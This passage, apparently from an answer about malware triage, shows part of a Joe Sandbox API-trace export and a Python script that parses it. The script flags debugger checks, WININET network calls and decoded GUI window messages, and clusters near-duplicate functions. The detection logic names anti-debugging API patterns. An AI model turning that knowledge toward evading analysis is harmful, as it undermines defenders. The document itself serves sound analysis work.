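  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
• IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• API String ID: 3158253471-631824599
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
                    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]{8})$")
# Control messages seen in this report, decoded from their winuser.h values.
WINDOW_MESSAGES = {0x30: "WM_SETFONT", 0xB1: "EM_SETSEL", 0x143: "CB_ADDSTRING",
                   0x14E: "CB_SETCURSEL", 0x180: "LB_ADDSTRING",
                   0x182: "LB_DELETESTRING", 0x1A2: "LB_FINDSTRINGEXACT"}
# ATL's CAtlBaseModule constructor (atlcore.h) emits exactly this call pair
# and this string; it is library code, not sample-specific anti-debug logic.
ATL_INIT_MSG = "Unable to initialize critical section in CAtlBaseModule"


def parse_blocks(text):
    """One record per function; a record starts at each 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "meta": {}}
                records.append(rec)
            section = line
        elif rec is not None and line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs" and (m := API_RE.match(item)):
                args = m["args"].split(",") if m["args"] is not None else []
                rec["apis"].append({"name": m["name"], "module": m["module"],
                                    "args": args, "ref": m["ref"], "caller": m["caller"]})
            elif section == "Strings" and (m := STRING_RE.match(item)):
                rec["strings"].append((m["text"], m["xref"]))
            elif ": " in item:  # Source File / Snapshot File / Similarity fields
                key, _, value = item.partition(": ")
                rec["meta"][key] = value
    return records


def triage(rec):
    """Findings for one record: debugger checks, network use, decoded GUI messages."""
    findings = []
    direct = {a["name"] for a in rec["apis"] if a["caller"] is None}
    if {"IsDebuggerPresent", "OutputDebugStringW"} <= direct:
        atl = any(ATL_INIT_MSG in s for s, _ in rec["strings"])
        findings.append("debugger-check: " + ("ATL CAtlBaseModule boilerplate" if atl
                                              else "IsDebuggerPresent+OutputDebugStringW"))
    for a in rec["apis"]:
        if a["module"] == "WININET":
            findings.append(f"network: {a['name']} @{a['ref']}")
        elif a["name"] == "SendMessageW" and len(a["args"]) > 1 \
                and re.fullmatch(r"[0-9A-F]{8}", a["args"][1]):
            msg = int(a["args"][1], 16)
            findings.append(f"gui: {WINDOW_MESSAGES.get(msg, hex(msg))} @{a['ref']}")
    return findings


def cluster_by_api_string_id(records):
    """Group records sharing Joe Sandbox's 'API String ID' (same API set and
    same referenced strings): a cheap way to spot near-duplicate functions."""
    groups = defaultdict(list)
    for rec in records:
        first = next((a["ref"] for a in rec["apis"] if a["caller"] is None), "?")
        groups[rec["meta"].get("API String ID", "?")].append(first)
    return dict(groups)
```

Run it over the full exported text instead of SAMPLE (parse_blocks handles the Memory Dump Source and Snapshot File lines too, storing them in meta) and print triage(rec) per record plus cluster_by_api_string_id(records); records whose only finding is the ATL boilerplate can be dropped from the anti-debug review list, while the WININET and clustered GUI records show where the AutoIt runtime's Inet and GUICtrl helpers live in the binary.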